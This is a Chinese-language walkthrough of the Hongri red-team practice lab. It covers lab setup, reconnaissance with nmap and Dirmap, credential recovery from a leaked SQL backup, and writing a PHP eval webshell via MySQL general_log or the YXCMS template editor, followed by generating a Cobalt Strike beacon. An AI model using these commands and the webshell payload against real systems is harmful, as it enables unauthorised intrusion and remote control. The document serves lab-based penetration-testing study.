0x01 關於紅日靶場的下載和介紹
百度網盤: https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset
密碼: 【紅日安全】您的下載密碼為:n1u2。
紅隊實戰系列,主要以真實企業環境為實例搭建一系列靶場,通過練習、視頻教程、博客三位一體學習。另外本次實戰完全模擬ATT&CK攻擊鏈路進行搭建,開成完整閉環。后續也會搭建真實APT實戰環境,從實戰中成長。關於環境可以模擬出各種各樣實戰路線,目前給出作者實戰的一套攻擊實戰路線如下,虛擬機所有統一密碼:hongrisec@2019:
網絡配置如圖所示
打開虛擬網絡編輯器
設置VMnet1子網IP
添加Vmnet2子網IP
網絡拓撲圖
實際配置的截圖為
0x02 滲透服務器
信息收集
打開win7 x64的 phpstudy
發現主機
netdiscover -i eth0 -r 192.168.52.0/24
使用攻擊機kali自帶的 nmap 進行端口掃描
nmap -sS -A -n -T4 -p- 192.168.52.143
可知道已經開啟勒 80 和其他端口
訪問 80 端口
phpstudy的探針界面,我們使用 root/root 開始連接一下數據庫
正上腳提示已經連接數據庫成功
使用御劍開始進行掃描
得到 /phpmyadmin ,我們先放着我們的掃描得到的端口
使用 Dirmap 對於網站掃描以便得到網站的目錄文件
dirmap.py -i http://192.168.52.143/ -lcf
下載源碼文件 beifen.rar ,審查文件
使用VScode的搜索功能在PHP源文件(beifen\yxcms\data\db_back\1384692844.sql.php)找到密碼
得到后台登陸的賬號密碼:admin:123456 和登錄路徑 /index.php?r=admin
0x03 開始 拿shell
登入 /phpmyadmin
弱密碼 root/root
使用SQL語句查看是否有無權限
show variables like '%secure_file%';
secure_file_priv 值為 NULL 不能使用into 方法導入shell
我們嘗試在日記寫 shell ,使用SQL語句開啟日志服務
set global general_log = "ON";
查看當前日志: show variables like 'general%';:
指定日志文件: set global general_log_file = "C:/phpStudy/www/1.php";:
開始寫入一句話木馬
SELECT '<?php eval($_POST["cmd"]);?>'
記錄一下出錯是怎么回事兒,自己運行的
phpstudy是在桌面上(Desktop)的 ,直接桌面上的導致路徑出錯,桌面上的打開的phpstudy的文件是在C:\WWWW
實際上輸入一句話放在地方是C:\phpStudy\WWW
因為自己電腦裝了兩個phpstudy所以導致路徑的問題,解決方法是:直接進入C:\phpStudy打開PHPSTUDY.EXE
這樣我們就成功拿到 shell
0x04 另一種方式獲取到SHELL
我們打開 192.168.52.143/yxcms
查看一下是否存在 目錄遍歷漏洞
我們使用之前得到的地址訪問 /index.php?r=admin 進入后台
密碼之前已經得到了:admin/123456
在前台模板的模塊寫入一句話木馬
使用蟻劍連接到 shell
0x05 內網以及與域滲透
使用 CS 創建 Listen,payload 選擇 beacon http
然后選擇 攻擊 -> 生成后門 -> Windows Executable(S) 選擇剛創建的 Listenner
由於我們之前關閉勒防火牆,所以我們直接點擊生成的 exe 文件就可以獲得CS的shell
